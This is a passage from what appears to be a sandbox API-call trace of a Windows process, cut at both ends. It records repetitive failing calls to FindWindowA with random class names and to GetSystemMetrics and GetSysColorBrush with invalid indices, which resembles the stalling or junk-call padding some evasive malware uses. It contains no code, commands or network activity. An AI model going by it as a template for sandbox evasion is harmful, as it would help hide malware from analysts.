lpWindowName="m9qx2ctP2HfowD8t408oH1PmUbEzvO2D3GWHdcVy3pukiyS5crtybk1crWfrFTqQfhtdHTwRW") returned 0x0 [0306.647] GetCurrentProcessId () returned 0xf94 [0306.647] GetSystemMetrics (nIndex=56645659) returned 0 [0306.647] GetSysColorBrush (nIndex=23889644) returned 0x0 [0306.647] GetSystemMetrics (nIndex=65974856) returned 0 [0306.648] FindWindowA (lpClassName="hREY7DLgjznUiKDG0mzmTJq4s8uQ5NLHrYzX4l28T8yGh5UaY0bytXhWmqflCvCViHKEtXTFK", lpWindowName="STB2EN0BCAquxpxf2AzCDJAs36iL06SiqRTTdrDnouIVLqOmUdgZXtS53IvDgj5ogqoUe3CHa") returned 0x0 [0306.648] FindWindowA (lpClassName="Wgxsxcwv8s0G9s83W4BNn3SyYcW0uxdCAB7nmt6658emjMaKXwNEFXgz2lIG41uJDsKLEubuH", lpWindowName="DPCZEYIFmh2KNfmJlqzWBvCXJxhZFaBpm1eHxtWPB1ItdsWlhi1vhT8FDDaKoHW2rLc6AvePJ") returned 0x0 [0306.648] GetCurrentProcessId () returned 0xf94 [0306.648] GetSystemMetrics (nIndex=94953368) returned 0 [0306.648] GetSysColorBrush (nIndex=83433567) returned 0x0 [0306.648] GetSystemMetrics (nIndex=32698449) returned 0 [0306.648] FindWindowA (lpClassName="Etz2meRpfwY3Rb07xoQ3jKRkDmupQrNsL1TmvYOZ5bL8lGfUOE5CIZLk4Nnar1jbJBuF9sP2w", lpWindowName="WU1bTwDwHKElzSSjBbvvi6X9ISz24DSpKSKQEDc8MolsspWqMwo2iSKoUn9jvXWnvbW0F0GH0") returned 0x0 [0306.648] FindWindowA (lpClassName="EBt9S4DDQn19BblMuJs5c7LaHJ16TfkhzGDow7MneyNKzVlqet7FFsSNUVpy2I03lOJjOpuPR", lpWindowName="eNks7VZXGlnNqrOvpwNoiWqo3oHv84DQbhKSq6klv47OZi9wBBJYKEnxxuV1mj3g9vBJ2LTPn") returned 0x0 [0306.648] GetLastError () returned 0x57 [0306.648] GetSystemMetrics (nIndex=53238728) returned 0 [0306.648] GetSysColorBrush (nIndex=52533293) returned 0x0 [0306.648] GetSystemMetrics (nIndex=98692336) returned 0 [0306.648] FindWindowA (lpClassName="vxr08IES8jYNcr34xTft0d7ghZBWAv7vOaXryg6JJ69ehAZ8Ki063ra5c2DUIIq03fCdDDxaA", lpWindowName="PgWc6rzt26xoiruLrwxOPOKHqlvPsLsT7izFsP1j106ZpPpKU04KOk5Ua7LIrTuVH18CBktRr") returned 0x0 [0306.648] FindWindowA (lpClassName="hFO98XklvxFefZOTsKRPeWWsM3OLWrHd54Wg8NLSJh1DSdB7XbnwEP4cmXFQCLWMLzbV9NINA", lpWindowName="RWGap93S25ue9CHBn2TeWlQjRFp6NMgQ3msl2PbixNNgVGNTDB2hvzsojL6BYOXXsqwblyU7a") returned 0x0 [0306.648] GetConsoleWindow () returned 0x0 [0306.648] GetSystemMetrics (nIndex=97566679) returned 0 [0306.648] GetSysColorBrush (nIndex=85977974) returned 0x0 [0306.648] GetSystemMetrics (nIndex=44429694) returned 0 [0306.648] FindWindowA (lpClassName="dJcsdaMWTYl813lLKht9uAei8rVtXJOAY0Q0nty9AGV3sUy2pvuLt3xiHftn6bToDkmNAP2sa", lpWindowName="3iHjRVj1XkJTGzE0j64tbu25jjZXVOeAzwnAbjJVMzP0MMHqzIctsRDuwHN65dwg6TacFe8b9") returned 0x0 [0306.649] FindWindowA (lpClassName="CIbMJM2jDOyQWPJR2v94gbqtMrEOZtiaW19dbQQTj1beZjVLzgDozOFU45xIJwqk3ZRWZ4KGn", lpWindowName="wq8azNDkAqF0sTAMG6DFeM58ZjzJuQpSv9lVUkEBM4m2s0GufdkpgZgQIUlEhtGZw2HsSkaFh") returned 0x0 [0306.649] GetCurrentProcessId () returned 0xf94 [0306.649] GetSystemMetrics (nIndex=94759678) returned 0 [0306.649] GetSysColorBrush (nIndex=83953226) returned 0x0 [0306.649] GetSystemMetrics (nIndex=98894842) returned 0 [0306.649] FindWindowA (lpClassName="EurTVeLZxQhOFrvVD5x00LFEPhJON60tmzqU5sNZ8KXPYCygq74cjIhqneoAFEjoU7kdsPcw4", lpWindowName="t7j7MGSqqiQRFfZ82BUw5rnb6hFmvUR6NZo9omhFFnpl83MXmakYTTOrAd689CmHTtydggFaf") returned 0x0 [0306.649] FindWindowA (lpClassName="xErGsRiYKLXdQrqTDb3XUV4HH6Nb2j4xTLIs01QcCwnyGeJ4V5IjARNj3Kepf3CmNa0vyQmHM", lpWindowName="UfwJKotgKDMCDN1yCebDYfJ9zyHTbCT79XDtdRKA4zXniEa8uj4ePKTKZu5ziMWLCVnHxwITN") returned 0x0 [0306.649] GetLastError () returned 0x57 [0306.650] GetSystemMetrics (nIndex=72579332) returned 0 [0306.650] GetSysColorBrush (nIndex=87783385) returned 0x0 [0306.650] GetSystemMetrics (nIndex=76342895) returned 0 [0306.650] FindWindowA (lpClassName="4uis42nxhWgRrdYJlqOoUdDhD6Z6bj8qIiwmZrSFT83WXNgkENYKOHSYRyRzUVBucWbP9EVgm", lpWindowName="4tHEtTWQ8ZJX4nopK0o5sJmkTwnYMwZakBN0WKu601Va9BBBjxNCNM5C4gNo9LtxEO6FqsGEr") returned 0x0 [0306.650] FindWindowA (lpClassName="hBy6oisO1wyI3nNDSdo7stJKiya5KCdJ6qQw9f0QNQebqDwFfmvPhGlhvBXzxaOIRk6uTeNuY", lpWindowName="vj7aNVCESml51o0AagGwTPE1owHmNu5jZuidK4jDXvhyeUzfKtepCoHnTwzMAfXEYbKnYyCku") returned 0x0 [0306.650] GetCurrentProcessId () returned 0xf94 [0306.650] GetSystemMetrics (nIndex=46797735) returned 0 [0306.650] GetSysColorBrush (nIndex=46738428) returned 0x0 [0306.650] GetSystemMetrics (nIndex=69696537) returned 0 [0306.650] FindWindowA (lpClassName="pVS51yOdk7N0SWxx1SpToxqfaMeu3B5sybEhceRawHjmytCECYVFbt5ZKdx64KdN9CVkLUEVZ", lpWindowName="KZ35zGr1Zrl25aeXGtvXptI68kTbSEJebcUdDgDLuuX6eFKu9x3MELFsUDPUOrnUZi57ohfe8") returned 0x0 [0306.651] FindWindowA (lpClassName="uT65bvePvrQoDTciQ1Ee3vSx7pvtDamdMz5FGsDMLM1dtVjhna5fc39NL6GVDj4ABgYMsX0ld", lpWindowName="176rBfgiuujLnk9w1iPmkx9SSSSgkEd59kUeriQvdOKsuiWmW8LodasTrC0jfAtIJLQZuRiZ8") returned 0x0 [0306.651] GetLastError () returned 0x57 [0306.651] GetSystemMetrics (nIndex=67974422) returned 0 [0306.651] GetSysColorBrush (nIndex=23568638) returned 0x0 [0306.651] GetSystemMetrics (nIndex=26742548) returned 0 [0306.651] FindWindowA (lpClassName="fr3WnGp1F3l0ZgsoPd0MaPr0hY9nGV2lhd3N2F7gibJHYmvyuqmCygnUvzwgQJOVOp6EN9jNT", lpWindowName="XG2ELkwqthl2BTI2sBpKpUoLVx6d96DOcEKP8TG1ZsARy6fdSqo8QplLXW00DsDvUDu5n3fWT") returned 0x0 [0306.651] FindWindowA (lpClassName="KlXfJJbSvvp9aTfOFscrkOSM82QHPP8EURqqTht1dDqCP0tKyTvJuqTxVxocCub5aYJGlJJQ5", lpWindowName="yNhc0g1ZxS0ObYc4WGkUU8fzGnvwA60YgUoj75Lrn8Ak38O2OMJPd3ZcpARQJpIKmaoT7DkWk") returned 0x0 [0306.651] GetCurrentThreadId () returned 0xbe0 [0306.651] GetSystemMetrics (nIndex=23748452) returned 0 [0306.651] GetSysColorBrush (nIndex=65987629) returned 0x0 [0306.651] GetSystemMetrics (nIndex=33326959) returned 0 [0306.651] FindWindowA (lpClassName="aena9fudgYixyEV6HnO6J3WSgsAvKPccUC5BwSGhuGWhkt2QEsQK0QCitZsofi3jZFZpay84i", lpWindowName="sXF9EU05Di1htxkgej0WCKVjd1piJE6N0SSRax0vqizV0r1cM7YVGFFUvfQwvsLv11v061W4r") returned 0x0 [0306.651] FindWindowA (lpClassName="hiTQ6Eo6WgiA1phRXnkAh4pEgsbKhp4AxqrMrhGWKVFekasCOBFPqoAvJ9me2vpWhStPyMqZ4", lpWindowName="KV3YsJwRYWnirT1ffk7DClDzS3jCxU98Smd9Xt3LeMfwQBtyp0kLIXrxMVbCn7dAjhfZRk0Pw") returned 0x0 [0306.652] GetLastError () returned 0x57 [0306.652] GetSystemMetrics (nIndex=67964685) returned 0 [0306.652] GetSysColorBrush (nIndex=59539828) returned 0x0 [0306.652] GetSystemMetrics (nIndex=74263954) returned 0 [0306.652] FindWindowA (lpClassName="lDeLSbT8SbJUKj1ZKC6G9WhrqAxIBM60WCp2DiULDDM2PSDQufYFl1qmAcap6kImqPV9lJ6mK", lpWindowName="nWQEQ5z3jJqwRbsxAd8Z9TtX7E4vKSAv9mhXDR4oZndjB0lXa56IygOveMk3XVP6FIpCqvJRI") returned 0x0 [0306.652] FindWindowA (lpClassName="xk6j2djKHyuJacrsrrSEcAA23TT4lqSjabscU6u5qh6pYlLCepT0NLnfF82RpE4N4wzIw7mIu", lpWindowName="kkHd5bOOxPVtJTpunwyjvMJUH3LIw9UEbP7RzEbycopLeppkQUzLhSC7qpWfcoaEnphSwOCmm") returned 0x0 [0306.652] GetConsoleWindow () returned 0x0 [0306.652] GetSystemMetrics (nIndex=77389462) returned 0 [0306.652] GetSysColorBrush (nIndex=49777347) returned 0x0 [0306.652] GetSystemMetrics (nIndex=69986938) returned 0 [0306.652] FindWindowA (lpClassName="A9TFMkSx0GiXrHRlJanjq0WWRhz4LmXXNe0IVr0WZgdcVpEshVNnfMxnz60a8Na1Czu2zzye6", lpWindowName="4JObhcHGs86ArzLZ8oo75Z0ZnlkW5zMRYLlgp6I4W3SGt404cFNGvDWNpuf4EnUxk5aJFukwt") returned 0x0 [0306.652] FindWindowA (lpClassName="xeNsXhNyhRAk2Yr0f3PRAzFbgAGWIiQnbKHBgu1S4rMubDIag95oikAosBSsHDBrmY6WgBF8b", lpWindowName="Ox341Bxs0fHkKTKPGNKtLHKqlVFDXb7L9oTrdlAriOnu1PtXKvxboLNZgoNxpjfCufA4fTDnt") returned 0x0 [0306.652] GetCurrentProcessId () returned 0xf94 [0306.652] GetSystemMetrics (nIndex=92576569) returned 0 [0306.652] GetSysColorBrush (nIndex=86669925) returned 0x0 [0306.652] GetSystemMetrics (nIndex=43796289) returned 0 [0306.652] FindWindowA (lpClassName="da1xUzI0ME3ABtD9qKtdI0QMVCmu1iCGwup5T27ErbX9BUP7DwNoVxWOiZJWAKZnfFHwvZ6G6", lpWindowName="7KAhVhj1I9xdTmvk9VjDGKO3yQh0BmWdDkIxxC4qZpw8aaKJTJSx3rA5CnTUKgyK5QQwjjaF8") returned 0x0 [0306.652] FindWindowA (lpClassName="4IzRBumJa2quG6a7OpIfew6SsTWnEkJuBeTkvcVVmsAqZ8XCKa1qCAZ5Cbg83fN04NdvWeDKc", lpWindowName="M8xfLX6eiFU4fBatCfz4rGprcJoUf1qP4HzdNRASN3C6XPWw35bxEZz7saPfzeOkZ4R02v5XM") returned 0x0 [0306.653] GetConsoleWindow () returned 0x0 [0306.653] GetSystemMetrics (nIndex=96868677) returned 0 [0306.653] GetSysColorBrush (nIndex=57368282) returned 0x0 [0306.653] GetSystemMetrics (nIndex=23285828) returned 0 [0306.653] FindWindowA (lpClassName="bgCfXRpG3MhovsHlDDfNBk04qbH0tZLyBVHbisMt6qCwy9PGxvwZ1JuWoM9X4NZWJYxsZ9Qgf", lpWindowName="KEb2pCsOn5GFuW3zpPaatNle7p95lzBUpchx2wk43s3iOUK4rfFjv3Us1mBYSBCQ31F1lGKI9") returned 0x0 [0306.653] FindWindowA (lpClassName="zzFM95lYrKuhGtvDbbTnTXY0IPR6J6tkabhSBntU04vWNdWmhiuV9NdQuv4QuLYUNXTKvo4AL", lpWindowName="ts0AwRZ4EpPkqOcLlzzXczpS6aVBepdJqH42KmHtja2TkwCAG1K39IYp6ur6G8stIJScNq13E") returned 0x0 [0306.653] GetCurrentThreadId () returned 0xbe0 [0306.653] GetSystemMetrics (nIndex=76556742) returned 0 [0306.653] GetSysColorBrush (nIndex=97724694) returned 0x0 [0306.653] GetSystemMetrics (nIndex=38339857) returned 0 [0306.653] FindWindowA (lpClassName="M1U2MqpOhePXsFR2NvMRKGE0YaewOPCNVY3jDzzZXts2uoDrmNXiE36ZUykPf3sjJZDGji7Fg", lpWindowName="5NcZ0B4DJkmqZFYbxMFIAgunaLgvecOOxmDnwyMx0NMr1SJvFUSCSekuxVgOY8vO9wANr0BbN") returned 0x0 [0306.653] FindWindowA (lpClassName="rmoks31jrc1Szv4cLLpf6P0v7NoH9kVPVdTdjD5iGHqyyaR27KICp3LH9UkWDuCNX05LBVtVc", lpWindowName="7RiGWBoMqWklaFFpC9vJErOxAxGbdU9ceiEQ5MzOciSqn3cq49lIiw7LjdOwUzmwigtJKIFtn") returned 0x0 [0306.653] GetLastError () returned 0x57 [0306.653] GetSystemMetrics (nIndex=32344396) returned 0 [0306.653] GetSysColorBrush (nIndex=57538674) returned 0x0 [0306.653] GetSystemMetrics (nIndex=78758742) returned 0 [0306.653] FindWindowA (lpClassName="dQOn1SHDLML0tdlmyoXz4mwzW0ux2reztbQMd9tGdw448nVZhR4SrqDE13ydlvbxBPeKIuAuf", lpWindowName="SbDXKIIzihD0tLkN4zhKrqQ5XvZ5wKMrJnHhMDgoaPcC1Af6txVcSlcxpiXKCy4Lx0HYIQlqX") returned 0x0 [0306.653] FindWindowA (lpClassName="7s4AmNMnAgeFMi0XxQ4NJOvA8GRb33ukYm25ifkQHX2RFyiU5Vc8uo0RYoN8qKOkCGdiqJoNF", lpWindowName="nJBYau9pNGADgZBXNb7zwKkKQtGTObJFGbnJ4058OUejld62G2aF0gH331dpRzJUY0rHp2DJY") returned 0x0 [0306.654] GetCurrentProcessId () returned 0xf94 [0306.654] GetSystemMetrics (nIndex=24948634) returned 0 [0306.654] GetSysColorBrush (nIndex=93398553) returned 0x0 [0306.654] GetSystemMetrics (nIndex=52746222) returned 0 [0306.654] FindWindowA (lpClassName="eK8FiPwiGrlntAfAGa34PFrs8lBYIdfKbFmpafCDNKSmHg4yDLBeWpihN0tQfHserg3PIBWGN", lpWindowName="3mqIzIJ0W4tpNHUR860ewMrJ4FxiaQDKL894NutdD2H2JxI2qDuEgRiSQSlWY5SCk8T859i09") returned 0x0 [0306.654] FindWindowA (lpClassName="frPqHJZYaMBNK1iXZL4ANsS21uD9Mtp2VzxQIMRmH0r1Hy55zODtwAsoIZ8jdX2i5l40Sp2bK", lpWindowName="oSJDXYSCxiw6jM3PhtOg3asEoXv2rqhTqLgPF83SNTgwiXD3sIsKcS8sLizAOrDitBLcba7X5") returned 0x0 [0306.654] GetConsoleWindow () returned 0x0 [0306.654] GetSystemMetrics (nIndex=76829845) returned 0 [0306.654] GetSysColorBrush (nIndex=85489794) returned 0x0 [0306.654] GetSystemMetrics (nIndex=72895394) returned 0 [0306.654] FindWindowA (lpClassName="FEDLmaugyBHFbwf84kTg47KCo8o7trurQyyRx0Ciup3vKIFFFeKznRscLXNP3YD6EIcDlGt9J", lpWindowName="bmMcA1KT2IREtuGahBX4rRNU2ccBjZ9kEqVDZHS1EaJt43KRBuPM0rNZxOTjaADvE5hxc9XUB") returned 0x0 [0306.654] FindWindowA (lpClassName="3wVG58W1dXVQ7T2jiSnzFCCwJkzVvCZbeeS5vffY8pji5rXgWipVLkwZQjx7RvgslSnHiiQGr", lpWindowName="EewwNhG4uEAcypCT1pUMsEaKrh3alz9FHZGaFIWhett4BtZ5AaKvmfGNJxxbarDKFWUCIgBn2") returned 0x0 [0306.654] GetCurrentThreadId () returned 0xbe0 [0306.654] GetSystemMetrics (nIndex=57769579) returned 0 [0306.654] GetSysColorBrush (nIndex=87797799) returned 0x0 [0306.654] GetSystemMetrics (nIndex=86452682) returned 0 [0306.654] FindWindowA (lpClassName="wxZnBRdySNu1uojQxu0MOAV8oBgeLkSEWKonGoCLJywdUnEpjGZG8mtBqPyTmio5PT4GvVPqn", lpWindowName="ZcSvindNkGxHlY4wNqaN77FCgUkEDDzrKXqOfF7smiAEyT2kOtSTo66Lrcr5yjOQco3Vj0aPi") returned 0x0 [0306.654] FindWindowA (lpClassName="0EG3ERUqSlBTBs8OlHwtJVUdOCxPgrwVuBlKIcHIWv6asuC9lnyBdWmwBnScbIFVUAq20Qxw2", lpWindowName="1rMPs31BtvN2ai3f5y0zWbT3j3jcJ2Fbua51hlVSQI8vJuWzCsLvVIfLUzW0vCLxEZ2nOkmhg") returned 0x0 [0306.654] GetConsoleWindow () returned 0x0 [0306.654] GetSystemMetrics (nIndex=55333445) returned 0 [0306.654] GetSysColorBrush (nIndex=62543668) returned 0x0 [0306.654] GetSystemMetrics (nIndex=28856797) returned 0 [0306.654] FindWindowA (lpClassName="uC0ZsWhuaWQjBlmhoP6fb3v9QPCqionZadzbJGeg4xNHyuMe8MgBgXmyQCnKZcv4wr457Yqu5", lpWindowName="o91Fr8lHugbosFMc4qmj80di0rRdeuJB9ObSaxdANP0Ya0fOJONduMErxhqivOP0tYe9HoR27") returned 0x0 [0306.655] FindWindowA (lpClassName="WpbHFGm4Fgic7P9ZyGpUGU3woxS8nXNHaO88h22ADBjH3LRgs1dKNVcESA31z9CpVS0z60E28", lpWindowName="Y50XGY9nyB17twsevu29aHSfT4CWQQpXjsW9DoxWhYQK4Hpo1EvgIsU5c5jagz9xzofxz3MCR") returned 0x0 [0306.655] GetCurrentProcessId () returned 0xf94 [0306.655] GetSystemMetrics (nIndex=99492763) returned 0 [0306.655] GetSysColorBrush (nIndex=93568823) returned 0x0 [0306.655] GetSystemMetrics (nIndex=66358545) returned 0 [0306.655] FindWindowA (lpClassName="zE2bs7qtdvD94WYRVk0kRczPMm4e4rNPNAk9bSFKI9pt3LZ5YRfvQ9gnsqN6mNV3aP4ktSerT", lpWindowName="jpAzky1D66hCashmznna85uR8ymUZ3urrVVnN8vd8O8hkht0Cwl0wU33goE6Hlt2roonWiIDw") returned 0x0 [0306.655] FindWindowA (lpClassName="zho1G4DncXlyXRWzNtCpFtj9W9WpZj075BhEo6wCiskehrFomCxULrZBqpYjgss2Tr6J5bRRD", lpWindowName="UlCwzD0488aQayRgmAaIdtYHAUeZCt1EpYU91WcjwjzR1jxdVcEQtpCAwc1qHrQFkUZKwz7Fi") returned 0x0 [0306.655] GetCurrentProcessId () returned 0xf94 [0306.655] GetSystemMetrics (nIndex=64386534) returned 0 [0306.655] GetSysColorBrush (nIndex=79567357) returned 0x0 [0306.655] GetSystemMetrics (nIndex=27878682) returned 0 [0306.655] FindWindowA (lpClassName="3P9pCWdywwXIo9OrDuypUJ1dCyaIg6hsPFOtIqkyHdTGVUX74KD45m4KYmD5KzXxcJ303WXnA", lpWindowName="Fi7HIsKs7GrZAHA5MekyquGBu76J1kqJ3kNoDfICtZckIZM40tjg4AQebW1cLLTCnDBuU2O8Q") returned 0x0 [0306.655] FindWindowA (lpClassName="hzapzqpkV40D7kCpFtLhauCGW8YtzZAPqa8u6cUYZc0BhWRmm7x4RbGpd7fJM0FWyDKA0Fiqt", lpWindowName="jKgUskQgabTVnlEPtYAgwPwRz3yaBEK2LISUjNovhkGgCAjcKJBzPlDNOhw8tF1iMXOkyuvSK") returned 0x0 [0306.655] GetCurrentProcessId () returned 0xf94 [0306.655] GetSystemMetrics (nIndex=76493635) returned 0 [0306.655] GetSysColorBrush (nIndex=42367963) returned 0x0 [0306.655] GetSystemMetrics (nIndex=73634598) returned 0 [0306.655] FindWindowA (lpClassName="ybtua93nII59rKim7xanAZAFA6RBMnMGhVNrqGUKFmhtS2fzqtgqueyVzMdVhByXpOlmoeyZK", lpWindowName="OUImBT7HVVfcORx9b0Ky8FnP0vATc6zuBphInkYkjwJEWzKyxMQBaHkw2lWzLPpS5yFU2Hrm1") returned 0x0 [0306.655] FindWindowA (lpClassName="i7gvhaLtwrK48ORYeUjCAU8LMNhobVXB9IjcaGN5YivQvwRX5ZaA6L3ZzXkUmtUEd0wEoNfL0", lpWindowName="8traZtf673JBaLz8RKrYYflqRSUTPLHr1pdgnzZAHl7SZM8XD8W5a8ZwKjQJnvTOx2GaB8FYy") returned 0x0 [0306.655] GetLastError () returned 0x57 [0306.656] GetSystemMetrics (nIndex=79288952) returned 0 [0306.656] GetSysColorBrush (nIndex=37866757) returned 0x0 [0306.656] GetSystemMetrics (nIndex=99932668) returned 0 [0306.656] FindWindowA (lpClassName="3AtNq51XLTXIxNi2pPT8mDUUjnC3jpV4UCok05SD6s58hfpohlI7WVYfjwnuRkvudHcIbDK4r", lpWindowName="D3ocCsKPlIsvVaYFXrYDc3HsSXlTbh49koLaq7zG6ctef8TA3iAuVSxUhTXhYDSWCsbSFNOF7") returned 0x0 [0306.656] FindWindowA (lpClassName="SnlQy54Z3R5VZFhSMYbwdROW00ggvyP21OPXtq5aQOLvrgsyMXI3cLP38nDtYJ6IzKXuwzOiP", lpWindowName="a59W1paYLaqC9V3dRHvragmD4UZhnJDnd2NtE1cigJ0GSMdZyBb1T93lX9W5DrUyNzLMdvrxg") returned 0x0 [0306.656] GetCurrentProcessId () returned 0xf94 [0306.656] GetSystemMetrics (nIndex=88734326) returned 0 [0306.656] GetSysColorBrush (nIndex=95842226) returned 0x0 [0306.656] GetSystemMetrics (nIndex=37674322) returned 0 [0306.656] FindWindowA (lpClassName="j9KvFBUHHHetaPMDuRMIBFVtQpkgcQYZeFJKF50YaLZixHgjpOHzc46SEcOVh1XKT3oQ9YdZP", lpWindowName="XXuoKA09nMxYyMBSSKPheBGKjQZbsCknHuocV1oWgZadbjwCnJoUK8COBc32Qu4z5FLhGsGn8") returned 0x0 [0306.656] FindWindowA (lpClassName="5ZqeEVXCvEUUlT3sTbOxZkeLZhKGGhWeapCdVK7EoDu8UUDGuwR81NN9rqaocOP3WYV9Ki3wF", lpWindowName="derhzwyBYU7R4lyHVh67dl5DjxtvlSCjjgTPxV8cd40uZAVTvhxz6NUhwKdcfmCRkPwDOMj8k") returned 0x0 [0306.656] GetConsoleWindow () returned 0x0 [0306.656] GetSystemMetrics (nIndex=69252852) returned 0 [0306.656] GetSysColorBrush (nIndex=78343244) returned 0x0 [0306.656] GetSystemMetrics (nIndex=42254675) returned 0 [0306.656] FindWindowA (lpClassName="dLydirwybxV6zwy6R6ts9dtHUaoYVUGA7KdNXy5KSQqfXNpAGmAMewKEmeWUWI7npasuAFTK6", lpWindowName="3KXS4RXWvLMfJVaWHfJ3naAH6GZ9oRqUdHo29NiVx6BXU8yhQlpKE3FZK76OjdeixQ2GeiN3Q") returned 0x0 [0306.656] FindWindowA (lpClassName="5hMccLdbDmfQXljZBCSdfcA0FJHIB5cocht8txX3J037MprpamEe6trwuVM9NpssUTIxUgpet", lpWindowName="VHsArm4VnqxZKnjbVOeNC2HzU8yvLlWPNKfYvxfFlfR9ptanGWINImNMtzQtdVN8gi6gFIfQl") returned 0x0 [0306.656] GetCurrentProcessId () returned 0xf94 [0306.656] GetSystemMetrics (nIndex=99368729) returned 0 [0306.656] GetSysColorBrush (nIndex=62482326) returned 0x0 [0306.656] GetSystemMetrics (nIndex=67259865) returned 0 [0306.656] FindWindowA (lpClassName="1zDtR8GCLdYgZ2STy3uYN3P6alzwuxhoqgzAOOJyN5vssfCL3IMPGEbYBHOIsXIBoyxuKZNI5", lpWindowName="5oEG3bVY3RoyAeV1kQ2eKw66OteEWkLRiCkH8gYuBVh4kq7ipnhP14n69DsTAjaYbcSaNGETd") returned 0x0 [0306.656] FindWindowA (lpClassName="3aV52CPt788BSuzJegUAyVE5t7hvR5QnhV6bWY5oxyIRM9EZRMJz7ZGtPIT29VwIbLAjgSDOv", lpWindowName="RwQbSjfhoDAYX4soDlBAenfgCmD5nFoiFcxbVHuCXv4lGWRvv72xsbFhljQEW89th3JtMN3jy") returned 0x0 [0306.657] GetLastError () returned 0x57 [0306.657] GetSystemMetrics (nIndex=74538494) returned 0 [0306.657] GetSysColorBrush (nIndex=88457223) returned 0x0 [0306.657] GetSystemMetrics (nIndex=35939256) returned 0 [0306.657] FindWindowA (lpClassName="USJZPdR3dI32aVj1j2MyL0PSnk2V9Ehyr5eByYJLmfavnl9PDrPvvr4A4mXb6RBE3GnzS4Nll", lpWindowName="TtZdNAAX1itxMM2qIRyNutbNXarHNhCwHLeQWDd8SmEZizyd0ojfJIdoHSi50NK4dXIuo6G7y") returned 0x0 [0306.657] FindWindowA (lpClassName="iaJOLGPCyJs8tCJ4ppre3iVHxj4DeRCd9ynRpxPDT7Q0PqGKl7tctrn9wbysHDMHZNoXBKk0R", lpWindowName="w94Lj7TuuqdJwc5QnPiXDL2shjBVOAclJME2e8hQs5c74A24lNk0dyeGfk69yrhWTZOb2n33f") returned 0x0 [0306.657] GetConsoleWindow () returned 0x0 [0306.657] GetSystemMetrics (nIndex=28756492) returned 0 [0306.657] GetSysColorBrush (nIndex=79949288) returned 0x0 [0306.657] GetSystemMetrics (nIndex=83264586) returned 0 [0306.657] FindWindowA (lpClassName="kzRuWZHHpszdA8AgCUpWJNNH99rHoqMiPGvcT3HQaDEIBZmX62p2PVpS9U6c0EoTIfuYE1Gz9", lpWindowName="Ry7w0KYo53f8g3JBHfu8Wo9wANAhjVEiN6CSJbD5iW7aw2M8GRrFzkPN77j3VolyEu55G7amE") returned 0x0 [0306.657] FindWindowA (lpClassName="bFnlp8nlNiuc1l2fs9ScfbuZLt4gAUsGUPuJ2PodJPa4PBsMQzgutWsiqk9vprFlc7a9bZQre", lpWindowName="LeCHw71QH1AqZhKqTmxITVvJjUyw8IoQZ5SEU5eJKeQg0mbhkZLfLn7siT865wyTN4YgTV3X6") returned 0x0 [0306.657] GetCurrentThreadId () returned 0xbe0 [0306.657] GetSystemMetrics (nIndex=38253578) returned 0 [0306.657] GetSysColorBrush (nIndex=82246836) returned 0x0 [0306.657] GetSystemMetrics (nIndex=62683768) returned 0 [0306.657] FindWindowA (lpClassName="RofOQINge5pmyol0MB2oVMw8L3Nqd8sTmJG9VoxgBqTf8TbycFd1FvJHHSYLNNOKMqAQqHcNi", lpWindowName="cRU4EFXiDekJ3TdFcJUxBGesVbP8zkXSU9CePswDhQs8iDGo3rqPPhhmNrIHYdagMBstm5tpH") returned 0x0 [0306.657] FindWindowA (lpClassName="XLxPSKaDY8OyVSLCLx9qzWX7Y39FM1Zfsx5SvcnmoggorM1U51RmUM5tJt34cNSDREdiozwEK", lpWindowName="RUmj4YsuFJHCGRQOUls7H21KXyymfdbnvu5s1AtEEcxJIghMnitAT5n5IELkPvJiVfT9d0Kws") returned 0x0 [0306.658] GetCurrentThreadId () returned 0xbe0 [0306.658] GetSystemMetrics (nIndex=32393336) returned 0 [0306.658] GetSysColorBrush (nIndex=77839275) returned 0x0 [0308.167] GetSystemMetrics (nIndex=98392589) returned 0 [0308.190] FindWindowA (lpClassName="REbbSqWy6yhKIDCdJOyapnxrpMCARCr4zdGc81tBDKsMlaZTXC1O8YFOGKjxRrJBdT3hVOfoa", lpWindowName="c8Wsa1xVPfvJcrgRYwTiizs2trQF69AzBlax3CF3EDNhm3soLBPh71YexuieaoEiIgxIX4a2d") returned 0x0 [0308.191] FindWindowA (lpClassName="8S4kwIgTxSl1C00GOzOLMrbAyfKUUTsGCoRblsaqv6UpdvNIsNrmwUlN5u9t3tgj2tusZBauF", lpWindowName="MeAjSWfchoZYFYZ5B6kzMCk8R6BEuZMrF6cI6NX8DYdD3ojxSnqPTGfRyilOYGxlSXPtLJboH") returned 0x0 [0308.223] GetLastError () returned 0x57 [0308.223] GetSystemMetrics (nIndex=49578524) returned 0 [0308.241] GetSysColorBrush (nIndex=35922364) returned 0x0 [0308.241] GetSystemMetrics (nIndex=73536286) returned 0 [0308.241] FindWindowA (lpClassName="5Ayy61leDYT3CEW8K69rklPGtfUR2IZ2mB1S7NLt2nQfj3SL3XByImciQTqVaAUnJvUmHVQGs", lpWindowName="CmZFOv1QDIIXJNZI95hFQr77BIElyct4Aj6PKnZpzRiKYpZgnSOKlq8AzrHqDoGL4RHyqyX3g") returned 0x0 [0308.241] FindWindowA (lpClassName="hmWvn7MIr9oDUTOX7NYEkZgzUny1swObdYSEvWRBLzZ02h67YrlvBndn4cXPaoaKk5lQn33hf", lpWindowName="TmvHeuSEBMSPh2Q6dQAjy4KjsfSXF4YP8arF3SLLny30KKziHtRbOE2u8qvJP3B6Uiu1gJ03O") returned 0x0 [0308.241] GetCurrentThreadId () returned 0xbe0 [0308.241] GetSystemMetrics (nIndex=55366734) returned 0 [0308.241] GetSysColorBrush (nIndex=96759973) returned 0x0 [0308.241] GetSystemMetrics (nIndex=35585434) returned 0 [0308.241] FindWindowA (lpClassName="UTjlTOSj3iH7JTRsbYH133TyWLIB4G3sV0ykPds7HX27KbNCCytJR8Cu6XFptEIP68v8ZdV60", lpWindowName="881nP7VxEE4FdgcL9fOPyc98bI89qTPFtysL1Q4GTOPwD7kkqPqQ5PNEEfuTlCH9WpIYaPHWf") returned 0x0 [0308.242] FindWindowA (lpClassName="r7J1hAkTkUFvMA0OSa91e9gqVNBeg10gAI4OMrxF2ltRPWacKwhzQyw8byxIFwOQfxFYy0quu", lpWindowName="GXAPZHAD2vQkWrpqiwdo3Hrdt6z3lSTpgTpRpRVcwo6HM8uA8D9eE4ZADtmvWvN20LBHSkD6q") returned 0x0 [0308.275] GetCurrentProcessId () returned 0xf94 [0308.275] GetSystemMetrics (nIndex=93847494) returned 0 [0308.275] GetSysColorBrush (nIndex=59283564) returned 0x0 [0308.275] GetSystemMetrics (nIndex=36579523) returned 0 [0308.275] FindWindowA 